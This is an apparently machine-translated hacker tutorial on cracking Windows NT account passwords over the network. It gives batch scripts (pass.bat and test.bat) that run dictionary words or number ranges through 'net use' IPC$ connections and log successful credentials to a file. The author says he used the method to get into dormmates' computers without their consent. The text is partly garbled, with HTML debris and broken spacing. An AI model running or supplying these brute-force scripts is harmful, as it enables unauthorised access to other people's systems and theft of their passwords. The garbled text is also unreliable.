Use the doscommand to unbind the user password of the remote NT Server

Comments: If you know an NT account and password, you can use net use \ host ipc $ Content $ nbsp; "password"/user: "user" to establish a connection with the remote host, this is a method that everyone who wants to become a hacker or a friend who is trying to become a hacker knows. I even know that I am not even a newbie, I can use it only if I know an NT account and password.
Net use \ host \ ipc $ Content $ nbsp; "password"/user: "user"
Establish a connection with a remote host. This is a method that every hacker or friend who wants to become or is trying to become a hacker knows. I even know that I am not even a newbie, I only know this one, and I use the one I only know to access other people's computers in the dormitory network, because their computer passwords are empty, after being discovered by them, I had a chat, and then added the passwords. Now I'm done. I want to have a peek at their passwords. They have to work out other methods to prevent them, maybe you will use other methods, such as searching for a system, to get management permissions, but I cannot, because as I said before, I will only use that one, some people may say that they can use software to brute force crack passwords. It may be good, but first I don't have any advanced software and I don't have the talent to study complicated usage, however, some commands were found when I accidentally looked at the help of DOS. It was really impossible:
1. dictionary: for/f % I in (dictionary file) do net use \ host \ ipc $ Content $ nbsp; "% I"/user: "user"
2. Number: for/l % I in (start, step, end) do net use \ host \ ipc $ Content $ nbsp; "% I"/user: "user"
For more information, see "for help" in DOS. Let me connect several machines, but the problem also arises. I still don't know the password when I connect them, you have to try it all again next time. I was disappointed. I accidentally discovered another good method. Maybe I am too stupid. Maybe you are smarter. Maybe you have already discovered it and will not talk nonsense, all the methods are provided below. please correct me: Save the following file as pass. bat: @ echo off
Echo ---------------------------------------------------------------------> c: \ pass.txt
Echo ---------------------------------------------------------------------> c: \ pass.txt
Date/t> c: \ pass.txt
Time/t> c: \ pass.txt
Echo cracking result:> c: \ pass.txt
If "% 6" = "1" goto sh * t2
: Sh * t1
Start "cracking"/min cmd/c for/f % I in (% 1) do call test. bat % 2 "% I" % 3
Goto quit
: Sh * t2
Start "cracking"/min cmd/c for/l % I in (% 1, % 2, % 3) do call test. bat % 4 "% I" % 5
: Quit saves the following files as test. bat: net use \ % 1 \ ipc $ Content $ nbsp; % 2/user: "% 3"
Goto answer % ERRORLEVEL %
Rem % ERRORLEVEL % indicates the result returned by the previous command execution. If the net use operation succeeds, 0 is returned, and if the operation fails, 2 is returned.
: Answer0
Echo remote host: "% 1"> c: \ pass.txt
Echo User: "% 3"> c: \ pass.txt
Echo password: % 2> c: \ pass.txt
Net use \ % 1 \ ipc $ Content $ nbsp;/delet
Exit
: Answer2 stores pass. bat and test. bat in system32. The usage is as follows:
1. If you use dictionary cracking: pass. bat dictionary file path and name host User Name
2. If a number is used for cracking: pass. bat start count step ends count host username 1
After the password is cracked, it is stored in the c: \ pass.txt file.
In addition, all I do is test in the LAN. If the remote test is restricted by the network speed, I can only find it by myself.